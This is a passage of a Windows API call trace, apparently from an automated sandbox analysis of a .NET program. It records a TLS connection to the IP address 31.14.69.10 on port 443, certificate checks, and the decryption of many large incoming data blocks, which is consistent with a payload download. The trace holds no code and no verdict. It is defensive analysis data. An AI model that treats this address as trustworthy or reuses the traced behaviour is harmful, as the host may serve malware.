[10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x300053a, FirstDnsSuffix=0x0), SizePointer=0x7fe8e8*=0xc20) returned 0x0 [0281.882] LocalFree (hMem=0xb365f0) returned 0x0 [0281.884] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x7fe8c8 | out: phkResult=0x7fe8c8*=0x5dc) returned 0x0 [0281.884] RegQueryValueExW (in: hKey=0x5dc, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x7fe908, lpData=0x0, lpcbData=0x7fe900*=0x0 | out: lpType=0x7fe908*=0x0, lpData=0x0, lpcbData=0x7fe900*=0x0) returned 0x2 [0281.884] RegCloseKey (hKey=0x5dc) returned 0x0 [0281.885] WSAConnect (in: s=0x59c, name=0x2af74d8*(sa_family=2, sin_port=0x1bb, sin_addr="31.14.69.10"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0281.914] closesocket (s=0x574) returned 0 [0281.954] EnumerateSecurityPackagesW (in: pcPackages=0x7fe738, ppPackageInfo=0x7fe650 | out: pcPackages=0x7fe738, ppPackageInfo=0x7fe650) returned 0x0 [0281.991] FreeContextBuffer (in: pvContextBuffer=0xa2d0a0 | out: pvContextBuffer=0xa2d0a0) returned 0x0 [0282.011] GetCurrentProcess () returned 0xffffffffffffffff [0282.011] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fe288 | out: TokenHandle=0x7fe288*=0x5dc) returned 1 [0282.013] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2af8a5c, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x7fe3f0, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x2afab08, ptsExpiry=0x7fe310 | out: phCredential=0x2afab08, ptsExpiry=0x7fe310) returned 0x0 [0282.040] InitializeSecurityContextW (in: phCredential=0x7fe2e8, phContext=0x0, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afad18, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe2e0 | out: phNewContext=0x2afadc0, pOutput=0x2afad18, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe2e0) returned 0x90312 [0282.041] FreeContextBuffer (in: pvContextBuffer=0x9ca7c0 | out: pvContextBuffer=0x9ca7c0) returned 0x0 [0282.065] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0282.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="GetCurrentPackageId", cchWideChar=19, lpMultiByteStr=0x7fe380, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentPackageId", lpUsedDefaultChar=0x0) returned 19 [0282.067] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentPackageId") returned 0x7ffb25208d40 [0282.067] GetCurrentPackageId () returned 0x3d54 [0282.069] send (s=0x59c, buf=0x2afade8*, len=184, flags=0) returned 184 [0282.071] recv (in: s=0x59c, buf=0x2afade8, len=5, flags=0 | out: buf=0x2afade8*) returned 5 [0282.121] recv (in: s=0x59c, buf=0x2afaded, len=59, flags=0 | out: buf=0x2afaded*) returned 59 [0282.122] InitializeSecurityContextW (in: phCredential=0x7fe248, phContext=0x7fe370, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2afb580, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afb5a0, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe240 | out: phNewContext=0x2afadc0, pOutput=0x2afb5a0, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe240) returned 0x90312 [0282.123] recv (in: s=0x59c, buf=0x2afb690, len=5, flags=0 | out: buf=0x2afb690*) returned 5 [0282.123] recv (in: s=0x59c, buf=0x2afb6b5, len=4280, flags=0 | out: buf=0x2afb6b5*) returned 4280 [0282.123] InitializeSecurityContextW (in: phCredential=0x7fe198, phContext=0x7fe2c0, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2afc838, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afc858, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe190 | out: phNewContext=0x2afadc0, pOutput=0x2afc858, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe190) returned 0x90312 [0282.126] recv (in: s=0x59c, buf=0x2afc948, len=5, flags=0 | out: buf=0x2afc948*) returned 5 [0282.126] recv (in: s=0x59c, buf=0x2afc96d, len=621, flags=0 | out: buf=0x2afc96d*) returned 621 [0282.126] InitializeSecurityContextW (in: phCredential=0x7fe0e8, phContext=0x7fe210, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2afcca8, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afccc8, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe0e0 | out: phNewContext=0x2afadc0, pOutput=0x2afccc8, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe0e0) returned 0x90312 [0282.126] recv (in: s=0x59c, buf=0x2afcdb8, len=5, flags=0 | out: buf=0x2afcdb8*) returned 5 [0282.126] recv (in: s=0x59c, buf=0x2afcddd, len=4, flags=0 | out: buf=0x2afcddd*) returned 4 [0282.127] InitializeSecurityContextW (in: phCredential=0x7fe038, phContext=0x7fe160, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2afceb0, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afced0, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe030 | out: phNewContext=0x2afadc0, pOutput=0x2afced0, pfContextAttr=0x2af8a28, ptsExpiry=0x7fe030) returned 0x90312 [0282.146] FreeContextBuffer (in: pvContextBuffer=0x9f55d0 | out: pvContextBuffer=0x9f55d0) returned 0x0 [0282.146] send (s=0x59c, buf=0x2afcfa0*, len=158, flags=0) returned 158 [0282.146] recv (in: s=0x59c, buf=0x2afcfa0, len=5, flags=0 | out: buf=0x2afcfa0*) returned 5 [0282.178] recv (in: s=0x59c, buf=0x2afcfa5, len=139, flags=0 | out: buf=0x2afcfa5*) returned 139 [0282.179] InitializeSecurityContextW (in: phCredential=0x7fdf88, phContext=0x7fe0b0, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2afd128, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afd148, pfContextAttr=0x2af8a28, ptsExpiry=0x7fdf80 | out: phNewContext=0x2afadc0, pOutput=0x2afd148, pfContextAttr=0x2af8a28, ptsExpiry=0x7fdf80) returned 0x90312 [0282.179] recv (in: s=0x59c, buf=0x2afd238, len=5, flags=0 | out: buf=0x2afd238*) returned 5 [0282.179] recv (in: s=0x59c, buf=0x2afd25d, len=1, flags=0 | out: buf=0x2afd25d*) returned 1 [0282.179] InitializeSecurityContextW (in: phCredential=0x7fded8, phContext=0x7fe000, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2afd328, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afd348, pfContextAttr=0x2af8a28, ptsExpiry=0x7fded0 | out: phNewContext=0x2afadc0, pOutput=0x2afd348, pfContextAttr=0x2af8a28, ptsExpiry=0x7fded0) returned 0x90312 [0282.179] recv (in: s=0x59c, buf=0x2afd438, len=5, flags=0 | out: buf=0x2afd438*) returned 5 [0282.179] recv (in: s=0x59c, buf=0x2afd45d, len=40, flags=0 | out: buf=0x2afd45d*) returned 40 [0282.180] InitializeSecurityContextW (in: phCredential=0x7fde28, phContext=0x7fdf50, pTargetName=0x2af7634, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2afd550, Reserved2=0x0, phNewContext=0x2afadc0, pOutput=0x2afd570, pfContextAttr=0x2af8a28, ptsExpiry=0x7fde20 | out: phNewContext=0x2afadc0, pOutput=0x2afd570, pfContextAttr=0x2af8a28, ptsExpiry=0x7fde20) returned 0x0 [0282.279] QueryContextAttributesW (in: phContext=0x2afadc0, ulAttribute=0x4, pBuffer=0x2afd698 | out: pBuffer=0x2afd698) returned 0x0 [0282.279] QueryContextAttributesW (in: phContext=0x2afadc0, ulAttribute=0x5a, pBuffer=0x2afd728 | out: pBuffer=0x2afd728) returned 0x0 [0282.286] QueryContextAttributesW (in: phContext=0x2afadc0, ulAttribute=0x53, pBuffer=0x2afda88 | out: pBuffer=0x2afda88) returned 0x0 [0282.292] CertDuplicateCertificateContext (pCertContext=0xa00a20) returned 0xa00a20 [0282.292] CertDuplicateStore (hCertStore=0x9fe000) returned 0x9fe000 [0282.293] CertEnumCertificatesInStore (hCertStore=0x9fe000, pPrevCertContext=0x0) returned 0xa02420 [0282.293] CertDuplicateCertificateContext (pCertContext=0xa02420) returned 0xa02420 [0282.293] CertEnumCertificatesInStore (hCertStore=0x9fe000, pPrevCertContext=0xa02420) returned 0xa00920 [0282.294] CertDuplicateCertificateContext (pCertContext=0xa00920) returned 0xa00920 [0282.294] CertEnumCertificatesInStore (hCertStore=0x9fe000, pPrevCertContext=0xa00920) returned 0xa00a20 [0282.294] CertDuplicateCertificateContext (pCertContext=0xa00a20) returned 0xa00a20 [0282.294] CertEnumCertificatesInStore (hCertStore=0x9fe000, pPrevCertContext=0xa00a20) returned 0x0 [0282.294] CertCloseStore (hCertStore=0x9fe000, dwFlags=0x0) returned 1 [0282.294] CertFreeCertificateContext (pCertContext=0xa00a20) returned 1 [0282.308] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x9fe680 [0282.309] CertAddCRLLinkToStore (in: hCertStore=0x9fe680, pCrlContext=0xa02420, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0282.311] CertAddCRLLinkToStore (in: hCertStore=0x9fe680, pCrlContext=0xa00920, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0282.311] CertAddCRLLinkToStore (in: hCertStore=0x9fe680, pCrlContext=0xa00a20, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0282.313] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0xa00a20, pTime=0x7fdf40, hAdditionalStore=0x9fe680, pChainPara=0x7fddd8, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x7fddc0 | out: ppChainContext=0x7fddc0) returned 1 [0282.325] CertDuplicateCertificateChain (pChainContext=0xb3e280) returned 0xb3e280 [0282.325] CertDuplicateCertificateContext (pCertContext=0xa00a20) returned 0xa00a20 [0282.325] CertDuplicateCertificateContext (pCertContext=0xa018a0) returned 0xa018a0 [0282.325] CertDuplicateCertificateContext (pCertContext=0xa01f20) returned 0xa01f20 [0282.325] CertDuplicateCertificateContext (pCertContext=0xa012a0) returned 0xa012a0 [0282.325] CertFreeCertificateChain (pChainContext=0xb3e280) [0282.326] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0xb3e280, pPolicyPara=0x7fe088, pPolicyStatus=0x7fe068 | out: pPolicyStatus=0x7fe068) returned 1 [0282.326] SetLastError (dwErrCode=0x0) [0282.328] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0xb3e280, pPolicyPara=0x7fe168, pPolicyStatus=0x7fe0b8 | out: pPolicyStatus=0x7fe0b8) returned 1 [0282.335] CertFreeCertificateChain (pChainContext=0xb3e280) [0282.335] CertFreeCertificateContext (pCertContext=0xa00a20) returned 1 [0282.338] CoTaskMemAlloc (cb=0x20c) returned 0xa1e5e0 [0282.338] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0xa1e5e0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0282.338] CoTaskMemFree (pv=0xa1e5e0) [0282.338] CoTaskMemAlloc (cb=0x20c) returned 0xa1e1a0 [0282.338] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0xa1e1a0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0282.338] CoTaskMemFree (pv=0xa1e1a0) [0282.338] CoTaskMemAlloc (cb=0x20c) returned 0xa1df80 [0282.338] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0xa1df80, nSize=0x104 | out: lpBuffer="") returned 0x0 [0282.338] CoTaskMemFree (pv=0xa1df80) [0282.338] CoTaskMemAlloc (cb=0x20c) returned 0xa1df80 [0282.338] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0xa1df80, nSize=0x104 | out: lpBuffer="") returned 0x0 [0282.339] CoTaskMemFree (pv=0xa1df80) [0282.340] EncryptMessage (in: phContext=0x2afadc0, fQOP=0x0, pMessage=0x2b07288, MessageSeqNo=0x0 | out: pMessage=0x2b07288) returned 0x0 [0282.340] send (s=0x59c, buf=0x2b05cd8*, len=159, flags=0) returned 159 [0282.355] setsockopt (s=0x59c, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0282.357] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.621] recv (in: s=0x59c, buf=0x2b13685, len=1203, flags=0 | out: buf=0x2b13685*) returned 1203 [0282.622] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b177a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b177a8, pfQOP=0x0) returned 0x0 [0282.661] setsockopt (s=0x59c, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0282.661] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.661] recv (in: s=0x59c, buf=0x2b13685, len=2382, flags=0 | out: buf=0x2b13685*) returned 2382 [0282.661] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3b428, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3b428, pfQOP=0x0) returned 0x0 [0282.661] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.661] recv (in: s=0x59c, buf=0x2b13685, len=583, flags=0 | out: buf=0x2b13685*) returned 583 [0282.661] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3b608, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3b608, pfQOP=0x0) returned 0x0 [0282.661] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.661] recv (in: s=0x59c, buf=0x2b13685, len=4737, flags=0 | out: buf=0x2b13685*) returned 4737 [0282.661] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3b7e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3b7e8, pfQOP=0x0) returned 0x0 [0282.662] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.662] recv (in: s=0x59c, buf=0x2b13685, len=5919, flags=0 | out: buf=0x2b13685*) returned 5919 [0282.662] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3b9c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3b9c8, pfQOP=0x0) returned 0x0 [0282.662] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.662] recv (in: s=0x59c, buf=0x2b13685, len=7098, flags=0 | out: buf=0x2b13685*) returned 7098 [0282.662] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3bba8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3bba8, pfQOP=0x0) returned 0x0 [0282.662] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.662] recv (in: s=0x59c, buf=0x2b13685, len=8277, flags=0 | out: buf=0x2b13685*) returned 8277 [0282.662] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3bd88, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3bd88, pfQOP=0x0) returned 0x0 [0282.662] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.662] recv (in: s=0x59c, buf=0x2b13685, len=9456, flags=0 | out: buf=0x2b13685*) returned 9046 [0282.662] recv (in: s=0x59c, buf=0x2b159db, len=410, flags=0 | out: buf=0x2b159db*) returned 410 [0282.675] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3bf68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3bf68, pfQOP=0x0) returned 0x0 [0282.676] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.677] recv (in: s=0x59c, buf=0x2b13685, len=2138, flags=0 | out: buf=0x2b13685*) returned 2138 [0282.677] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3c148, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3c148, pfQOP=0x0) returned 0x0 [0282.678] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.678] recv (in: s=0x59c, buf=0x2b13685, len=11814, flags=0 | out: buf=0x2b13685*) returned 11814 [0282.678] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3c328, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3c328, pfQOP=0x0) returned 0x0 [0282.678] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.678] recv (in: s=0x59c, buf=0x2b13685, len=12622, flags=0 | out: buf=0x2b13685*) returned 12622 [0282.678] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3c508, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3c508, pfQOP=0x0) returned 0x0 [0282.678] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.678] recv (in: s=0x59c, buf=0x2b13685, len=14172, flags=0 | out: buf=0x2b13685*) returned 14172 [0282.678] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3c6e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3c6e8, pfQOP=0x0) returned 0x0 [0282.679] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.679] recv (in: s=0x59c, buf=0x2b13685, len=15351, flags=0 | out: buf=0x2b13685*) returned 14019 [0282.679] recv (in: s=0x59c, buf=0x2b16d48, len=1332, flags=0 | out: buf=0x2b16d48*) returned 1332 [0282.697] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3c8f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3c8f0, pfQOP=0x0) returned 0x0 [0282.697] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.698] recv (in: s=0x59c, buf=0x2b13685, len=3317, flags=0 | out: buf=0x2b13685*) returned 3317 [0282.698] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3cad0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3cad0, pfQOP=0x0) returned 0x0 [0282.699] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.699] recv (in: s=0x59c, buf=0x2b13685, len=4904, flags=0 | out: buf=0x2b13685*) returned 4904 [0282.699] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3ccb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3ccb0, pfQOP=0x0) returned 0x0 [0282.700] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.701] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.701] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3ce90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3ce90, pfQOP=0x0) returned 0x0 [0282.701] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.701] recv (in: s=0x59c, buf=0x2b13685, len=11528, flags=0 | out: buf=0x2b13685*) returned 11528 [0282.701] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3d070, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3d070, pfQOP=0x0) returned 0x0 [0282.701] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.702] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.702] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3d250, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3d250, pfQOP=0x0) returned 0x0 [0282.702] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.702] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 12121 [0282.702] recv (in: s=0x59c, buf=0x2b165de, len=4287, flags=0 | out: buf=0x2b165de*) returned 4287 [0282.722] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3d430, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3d430, pfQOP=0x0) returned 0x0 [0282.722] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.722] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.723] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3d610, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3d610, pfQOP=0x0) returned 0x0 [0282.723] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.723] recv (in: s=0x59c, buf=0x2b13685, len=16032, flags=0 | out: buf=0x2b13685*) returned 16032 [0282.724] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3d7f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3d7f0, pfQOP=0x0) returned 0x0 [0282.724] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.724] recv (in: s=0x59c, buf=0x2b13685, len=4120, flags=0 | out: buf=0x2b13685*) returned 4120 [0282.724] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3d9d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3d9d0, pfQOP=0x0) returned 0x0 [0282.725] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.725] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 15905 [0282.725] recv (in: s=0x59c, buf=0x2b174a6, len=503, flags=0 | out: buf=0x2b174a6*) returned 503 [0282.729] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3dbd8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3dbd8, pfQOP=0x0) returned 0x0 [0282.729] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.729] recv (in: s=0x59c, buf=0x2b13685, len=12688, flags=0 | out: buf=0x2b13685*) returned 8768 [0282.729] recv (in: s=0x59c, buf=0x2b158c5, len=3920, flags=0 | out: buf=0x2b158c5*) returned 3144 [0282.747] recv (in: s=0x59c, buf=0x2b1650d, len=776, flags=0 | out: buf=0x2b1650d*) returned 776 [0282.747] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3ddb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3ddb8, pfQOP=0x0) returned 0x0 [0282.749] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.749] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.749] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3df98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3df98, pfQOP=0x0) returned 0x0 [0282.749] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.749] recv (in: s=0x59c, buf=0x2b13685, len=16032, flags=0 | out: buf=0x2b13685*) returned 16032 [0282.750] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3e178, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3e178, pfQOP=0x0) returned 0x0 [0282.750] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.750] recv (in: s=0x59c, buf=0x2b13685, len=400, flags=0 | out: buf=0x2b13685*) returned 400 [0282.750] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3e358, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3e358, pfQOP=0x0) returned 0x0 [0282.750] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.759] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.759] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3e538, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3e538, pfQOP=0x0) returned 0x0 [0282.760] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.760] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.760] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3e718, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3e718, pfQOP=0x0) returned 0x0 [0282.760] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.760] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.761] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3e8f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3e8f8, pfQOP=0x0) returned 0x0 [0282.761] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.761] recv (in: s=0x59c, buf=0x2b13685, len=16032, flags=0 | out: buf=0x2b13685*) returned 16032 [0282.761] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3ead8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3ead8, pfQOP=0x0) returned 0x0 [0282.761] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.807] recv (in: s=0x59c, buf=0x2b13685, len=4120, flags=0 | out: buf=0x2b13685*) returned 4120 [0282.807] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3ecb8, MessageSeqNo=0x0, pfQOP=0x0 